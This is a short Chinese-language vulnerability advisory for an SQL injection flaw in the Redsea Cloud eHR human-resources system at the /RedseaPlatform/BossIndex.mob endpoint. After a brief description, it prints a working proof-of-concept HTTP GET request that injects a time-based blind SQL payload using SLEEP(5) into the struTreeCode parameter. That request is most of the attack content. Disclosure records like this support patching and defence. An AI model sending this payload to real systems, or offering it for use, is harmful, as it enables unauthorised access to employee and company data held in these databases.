红海云eHR /RedseaPlatform/BossIndex.mob SQL 注入漏洞

日期: 2025-12-05 | 影响软件: 红海云eHR | POC: 已公开

漏洞描述

红海云eHR 是一款企业人力资源管理系统。该漏洞存在于 /RedseaPlatform/BossIndex.mob 接口中,攻击者可以通过构造恶意的SQL语句注入,获取数据库中的敏感信息或执行任意SQL命令。

PoC代码

GET /RedseaPlatform/BossIndex.mob?method=getNewStaffJoin&struTreeCode='+AND+(SELECT+3266+FROM+(SELECT(SLEEP(5)))ShXk)+AND+'qmyT'='qmyT HTTP/1.1

相关漏洞推荐